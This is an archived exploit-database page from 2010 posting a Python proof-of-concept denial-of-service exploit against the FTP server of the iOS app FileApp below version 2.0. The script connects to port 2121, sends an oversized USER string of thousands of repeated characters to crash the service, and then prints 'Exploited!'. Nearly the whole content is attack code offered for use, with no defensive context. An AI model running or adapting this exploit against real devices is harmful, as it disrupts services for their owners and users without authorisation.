[dos / poc] - FileApp < 2.0 for iPhone, iPad and iPod FTP
Posted on 02 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>FileApp < 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='FileApp < 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service by m0ebiusc0de in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>==================================================================== FileApp < 2.0 for iPhone, iPad and iPod FTP Remote Denial of Service ==================================================================== # Title : FileApp < 2.0 FTP Denial of Service for iPhone,iPod,iPad # Date : 02/10/2010 # Author : m0ebiusc0de # Software : http://www.digidna.net/products/fileapp/download # Version : FileApp < v.2.0, iPad 3.2.2 (jailed) # Tested on : Windows XP PRO SP3 #!/usr/bin/python # FileApp < v.2.0 FTP Remote DoS exploit # tested on iPad 3.2.2 import socket import sys def Usage(): print ("Usage: ./FileApp.py <serv_ip> ") print ("Example:./FileApp 10.10.10.10 ") if len(sys.argv) <> 2: Usage() sys.exit(1) else: hostname = sys.argv[1] username = "x41" * 5000 passwd = "a@b.com" #username = "anonymous" #passwd = "x41" * 5000 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 2121)) print "[+] Connecting to the target.." except: print ("[-] Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("USER %s " %username) sock.send("PASS %s " %passwd) sock.close() print "[+] Exploited!" sys.exit(0); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-02]</pre></body></html>